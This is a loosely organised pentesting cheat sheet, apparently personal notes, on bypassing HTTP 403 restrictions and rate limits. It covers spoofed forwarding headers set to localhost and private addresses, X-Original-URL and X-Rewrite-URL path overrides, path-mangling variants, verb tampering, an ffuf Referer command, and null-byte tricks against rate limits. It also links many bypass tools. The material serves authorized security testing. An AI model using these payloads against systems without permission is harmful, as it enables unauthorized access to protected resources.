403 Bypass
My Tool : https://github.com/ROOTBABU/4-ZERO-3
403 Bypass
Learn how we can show 403 to server https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html
https://book.hacktricks.xyz/pentesting/pentesting-web/403-and-401-bypasses
https://shubs.io/enumerating-ips-in-x-forwarded-headers-to-bypass-403-restrictions/ https://blog.ircmaxell.com/2012/11/anatomy-of-attack-how-i-hacked.html
https://hackerone.com/reports/1011767 https://infosecwriteups.com/importance-of-burp-history-analysis-to-bypass-403-afc7af6c08b https://www.zapstiko.com/403-forbidden-bypass-technique/ https://medium.com/r3d-buck3t/bypass-ip-restrictions-with-burp-suite-fb4c72ec8e9c https://kathan19.gitbook.io/howtohunt/rate-limit/ratelimitbypass https://news.ycombinator.com/item?id=26688390 https://github.com/devploit/dontgo403 https://github.com/yunemse48/403bypasser https://pentesttools.net/403bypasser-burpsuite-extension-to-bypass-403-restricted-directory/ https://github.com/vavkamil/XFFenum https://github.com/ivan-sincek/forbidden
https://www.hahwul.com/2021/10/08/bypass-403/ https://blog.intigriti.com/2020/02/24/twitter-recap-1-bug-bounty-tips-by-the-intigriti-community/ https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema https://sapt.medium.com/bypassing-403-protection-to-get-pagespeed-admin-access-822fab64c0b3 https://github.com/Dheerajmadhukar/4-ZERO-3/blob/main/403-bypass.sh
Researchers often use this header to inject SQL payloads, perform proxy enumeration, client IP spoofing, SSRF
127.0.0.1:80,
X-Forwarded-For: 2001:db8:85a3:8d3:1319:8a2e:370:7348X-Forwarded-For: 203.0.113.195X-Forwarded-For: 203.0.113.195, 70.41.3.18, 150.172.238.178Other non-standard forms:
# Used for some Google services
X-ProxyUser-Ip: 203.0.113.19403 tool-for one end-point
Different verbs: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK, TRACK,lock,update
we can`t show response of each request,we can analysis the response if response is getting some unique value,match content-length,time of response match these things to normal request. and show !Ãlert.
analysis response header, its gives some Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
use X-HTTP-Method-Override: PUT to overwrite the verb.same for all verbs too.
Change Host header: Host:proxy server ip address,different ip address what ever you identify from enumeration and test those ranges,localhost with different varaties,temprary hosts
Try to use other User Agents to access the resource.
3. Send a Request with an X-Rewrite-Url Header Pointing to a Non-Existing Resource
X-Rewrite-Url
X-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IP
127.0.0.1(or anything in the127.0.0.0/8or::1/128address spaces)localhostAny RFC1918 address:
10.0.0.0/8172.16.0.0/12192.168.0.0/16Link local addresses:
169.254.0.0/16
Note: Including a port element along with the address or hostname may also help bypass edge protections such as web application firewalls, etc. For example: 127.0.0.4:80, 127.0.0.4:443, 127.0.0.4:43982
X-Originating-IP: 127.0.0.1X-Forwarded-For: 127.0.0.1https://hackerone.com/reports/1011767X-Forwarded: 127.0.0.1 ,X-Forwarded-For: A, B, C, traverse the chain of proxies in reverse,X-Forwarded-For: 68.180.194.242, 68.180.194.242, 68.180.194.242, 68.180.194.242 ,192.168.0.0–192.168.255.255, enumeration ip applied here , those ranges should be applied hereForwarded-For: 127.0.0.1X-Host
X-Forwarded-IP
X-Remote-IP: 127.0.0.1X-Client-IP
X-Client
X-Remote-Addr: 127.0.0.1X-ProxyUser-Ip: 127.0.0.1X-Original-URL: 127.0.0.1Client-IP: 127.0.0.1True-Client-IP: 127.0.0.1Cluster-Client-IP: 127.0.0.1X-ProxyUser-Ip: 127.0.0.1Host: localhostX-Custom-IP-Authorization
Remote_Addr: 127.0.0.1
Content-Length: 0
Destination
Proxy
X-Real-IP X-Forwarded Forwarded-For X-Host X-Forwarded-IP X-Client X-Remote-Addr X-ProxyUser-Ip X-Original-URL Client-IP True-Client-IP Cluster-Client-IPX-Originally-Forwarded-For X-Originating- X-Originating-IP True-Client-IP True-Client-IP X-Arbitrary http X-HTTP-DestinationURL X-Forwarded-Proto CF-Connecting_IP CF-Connecting-IP X-Custom-IP-Authorization X-Custom-IP-Authorization X-Originating-IP X-Forwarded-For X-Remote-IP X-Client-IP X-Host X-Forwarded-Host X-Original-URL X-Rewrite-URL Content-Length X-ProxyUser-Ip Base-Url Client-IP Http-Url Proxy-Host Proxy-Url Real-Ip X-Forward-For X-Forwarded-By X-Forwarded-For-Original X-Forwarded-Server X-Forwarded X-Forwarder-For X-Http-Destinationurl X-Http-Host-Override X-Original-Remote-Addr X-Proxy-Url X-Real-Ip X-Remote-Addr
If the path is protected you can try to bypass the path protection using these other headers:https://hackerone.com/reports/737323
X-Original-URL: /admin/consoleX-Rewrite-URL: /admin/console
#or use double X-Forwarded-For header
X-Forwarded-For:
X-Forwarded-For: IP
Path Fuzzing
Other path bypasses/:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
Change the protocol: from http to https, or for https to http
Use all subdomain in referer to bypass like this:https://infosecwriteups.com/importance-of-burp-history-analysis-to-bypass-403-afc7af6c08b
ffuf -c -w words.txt -H “Referer: othersubdomain.target.com” https://somethingelse.target.com/FUZZ
Payloads: $1: HOSTNAME $2: PATH
Other non-standard forms:
Enumeration Learning from above:
How to identify Intermediate proxies is present or not.,you need to subdomain,subdomain ip addresses and those ranges are working or not,which ip address is active ,which ip address is working as proxy,which ip address is access only from specific servers,endpoints,dirsearch,bak files,wayback things all enumerations.
list of subdomain from orginal website and wayback too.
Github tools:
Different ip address with X-Forwarded-For header param:https://github.com/infosec-au/enumXFF
https://github.com/lobuhi/byp4xx https://github.com/iamj0ker/bypass-403 https://github.com/gotr00t0day/forbiddenpass
Using IP Rotate Burp Extension:https://github.com/PortSwigger/ip-rotate
https://github.com/devploit/dontgo403 https://github.com/yunemse48/403bypasser https://github.com/yunemse48/403bypasser https://github.com/vavkamil/XFFenum https://github.com/ivan-sincek/forbidden https://github.com/Dheerajmadhukar/4-ZERO-3/blob/main/403-bypass.sh
Rate Limit Bypass using Special Characters
Adding Null Byte ( %00 ) at the end of the Email can sometimes Bypass Rate Limit.
Try adding a Space Character after a Email. ( Not Encoded )
Some Common Characters that help bypassing Rate Limit : %0d , %2e , %09 , %20 , %0, %00, %0d%0a, %0a, %0C
Adding a slash(/) at the end of api endpoint can also Bypass Rate Limit.
domain.com/v1/login->domain.com/v1/login/
403-bypass techniques
Changing HTTP headers params:
Note: Including a port element along with the address or hostname may also help bypass edge protections such as web application firewalls, etc. For example:
127.0.0.4:80,127.0.0.4:443,127.0.0.4:43982
ip:localhost,127.0.0.1,127.0.0.1:port,
URL Encode Bypass
Last updated